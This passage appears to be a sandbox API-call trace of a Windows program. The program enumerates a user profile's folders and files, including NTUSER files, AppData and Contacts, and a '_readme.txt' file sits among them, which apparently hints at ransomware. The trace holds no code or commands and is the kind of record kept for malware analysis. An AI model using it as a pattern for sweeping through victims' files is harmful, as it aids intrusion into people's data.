ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0142.981] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdff56ee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdff56ee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x321efd0 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c988 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b358 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d1c8 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d220 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x7023a0 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b490 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b1b8 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b428 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x9ac50a8 [0142.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b698 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x9ac5100 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b700 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x9ac5158 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d118 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b4f8 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d068 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c6c8 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b560 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b5c8 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b630 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b288 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d010 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c778 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3255a48 | out: hHeap=0x620000) returned 1 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c778 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.982] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x32790f0 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b3c0 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b288 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32790f0 | out: hHeap=0x620000) returned 1 [0142.982] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d010 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.982] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0142.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b3c0 [0142.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0142.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b5c8 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b630 | out: hHeap=0x620000) returned 1 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0142.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c568 [0142.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321d170 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c568 | out: hHeap=0x620000) returned 1 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321c3b0 | out: hHeap=0x620000) returned 1 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0142.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x321c3b0 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdfebe960, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdfebe960, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8d16170, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.983] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8d16170, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.983] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32723f8 | out: hHeap=0x620000) returned 1 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fe8 | out: hHeap=0x620000) returned 1 [0142.983] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.983] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.983] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.984] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.984] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.984] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0142.984] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.984] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.984] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.984] PathFindFileNameW (pszPath="") returned="" [0142.984] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321d170 | out: hHeap=0x620000) returned 1 [0142.984] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.984] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xc37d6d90, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc37d6d90, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0142.984] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0142.984] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe00155c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe00155c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0142.984] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe00155c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe00155c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0142.984] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321cc48 | out: hHeap=0x620000) returned 1 [0142.984] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0142.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.985] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.985] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.985] PathFindFileNameW (pszPath="") returned="" [0142.985] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe00155c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe00155c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0142.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3280a80 | out: hHeap=0x620000) returned 1 [0142.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32724a0 | out: hHeap=0x620000) returned 1 [0142.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.985] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0142.985] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0142.985] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0142.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1a28 | out: hHeap=0x620000) returned 1 [0142.985] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.986] PathFindFileNameW (pszPath="") returned="" [0142.986] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325b3c0 | out: hHeap=0x620000) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0142.986] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, 